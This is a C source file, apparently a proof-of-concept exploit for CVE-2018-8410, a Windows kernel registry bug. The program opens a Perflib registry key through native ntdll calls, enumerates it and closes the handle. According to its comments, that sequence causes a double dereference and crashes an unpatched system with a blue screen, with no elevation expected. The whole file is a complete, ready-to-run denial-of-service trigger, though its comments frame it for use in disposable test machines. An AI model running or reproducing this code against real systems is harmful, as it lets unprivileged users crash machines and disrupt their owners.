#include <SDKDDKVer.h>
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include <winternl.h>
// Native registry API signatures. main() resolves the real entry points from
// the already-loaded ntdll.dll with GetProcAddress, presumably because
// winternl.h provides no prototypes for these two exports; the parameter lists
// below mirror the documented NtOpenKey / NtEnumerateKey (ZwOpenKey / ZwEnumerateKey).
using lpfnNtOpenKey = NTSTATUS (NTAPI *)(_Out_ PHANDLE KeyHandle,
                                        _In_ ACCESS_MASK DesiredAccess,
                                        _In_ POBJECT_ATTRIBUTES ObjectAttributes);

using lpfnNtEnumerateKey = NTSTATUS (NTAPI *)(_In_ HANDLE KeyHandle,
                                             _In_ ULONG Index,
                                             _In_ ULONG KeyInfoClass,
                                             _Out_ PVOID KeyInformation,
                                             _In_ ULONG Length,
                                             _Out_ PULONG ResultLength);

// KEY_INFORMATION_CLASS value for KeyBasicInformation. Spelled out as a macro
// because the KEY_INFORMATION_CLASS enum is not available through winternl.h.
#define _KeyBasicInformation 0
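// Proof of concept for CVE-2018-8410 (per the file name): a Windows kernel
// registry bug triggered from user mode.
//
// What the code does (and nothing more):
//   1. opens \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\009
//      through the native NtOpenKey with KEY_READ,
//   2. calls NtEnumerateKey(index 0, KeyBasicInformation) on that handle into a
//      2 KB buffer,
//   3. closes the handle with RegCloseKey.
//
// According to the original author's comments, step 2 takes one reference on
// the key object but releases two, and step 3 then crashes the machine (BSOD).
// Treat this as a denial-of-service trigger against the kernel:
//   - run it ONLY inside a disposable virtual machine, never on a host you care about;
//   - it only does something observable on a build that still carries the bug
//     (confirm the affected/fixed builds before relying on it either way);
//   - KEY_READ on that key is normally granted to unprivileged users, so no
//     elevation should be needed — TODO confirm on the target build.
//
// Returns 0 when the full trigger sequence was issued, 1 when a precondition
// (ntdll lookup, NtOpenKey) failed before the trigger was reached, so a
// harness can tell "did nothing" apart from "trigger sent, system survived".
int main()
{
    // Native registry path of the key. Length/MaximumLength are derived from
    // the literal so they cannot drift out of sync with it: Length excludes the
    // terminating NUL, MaximumLength includes it.
    static WCHAR wszKeyPath[] =
        L"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\009";
    UNICODE_STRING usKey = {
        (USHORT)(sizeof(wszKeyPath) - sizeof(WCHAR)),
        (USHORT)sizeof(wszKeyPath),
        wszKeyPath
    };

    // Resolve the native API from the already-loaded ntdll.dll so no ntdll
    // import library is required. Every lookup is checked: calling a NULL
    // function pointer would just crash this process, which could be mistaken
    // for the kernel bug firing.
    HMODULE hNtDll = ::GetModuleHandleW(L"ntdll.dll");
    if (hNtDll == NULL)
    {
        fprintf(stderr, "GetModuleHandleW(ntdll.dll) failed: %lu\n", ::GetLastError());
        return 1;
    }
    lpfnNtOpenKey fnNtOpenKey =
        (lpfnNtOpenKey)::GetProcAddress(hNtDll, "NtOpenKey");
    lpfnNtEnumerateKey fnNtEnumerateKey =
        (lpfnNtEnumerateKey)::GetProcAddress(hNtDll, "NtEnumerateKey");
    if (fnNtOpenKey == NULL || fnNtEnumerateKey == NULL)
    {
        fprintf(stderr, "could not resolve NtOpenKey/NtEnumerateKey from ntdll.dll\n");
        return 1;
    }

    // Open the target key. InitializeObjectAttributes (winternl.h) sets Length,
    // RootDirectory, SecurityDescriptor and SecurityQualityOfService for us.
    OBJECT_ATTRIBUTES sObjAttr;
    InitializeObjectAttributes(&sObjAttr, &usKey, OBJ_CASE_INSENSITIVE, NULL, NULL);

    HANDLE hKey = NULL;
    NTSTATUS ntstatus = fnNtOpenKey(&hKey, KEY_READ, &sObjAttr);
    if (!NT_SUCCESS(ntstatus))
    {
        fprintf(stderr, "NtOpenKey failed: 0x%08lX\n", (unsigned long)ntstatus);
        return 1;
    }

    // Trigger: the original author's note is that this call references the
    // key object once but dereferences it twice. Its status is reported but
    // not acted on, so that the close below is always issued exactly as in
    // the original sequence.
    BYTE buf[2048];
    ULONG RetLength = 0;
    ntstatus = fnNtEnumerateKey(hKey, 0, _KeyBasicInformation, buf, sizeof(buf), &RetLength);
    if (!NT_SUCCESS(ntstatus))
    {
        fprintf(stderr, "NtEnumerateKey returned 0x%08lX; closing handle anyway\n",
                (unsigned long)ntstatus);
    }

    // Closing the handle is what the original author expects to crash the
    // system. RegCloseKey is kept (rather than NtClose/CloseHandle) to leave
    // the original trigger sequence unchanged.
    ::RegCloseKey((HKEY)hKey);
    return 0;
}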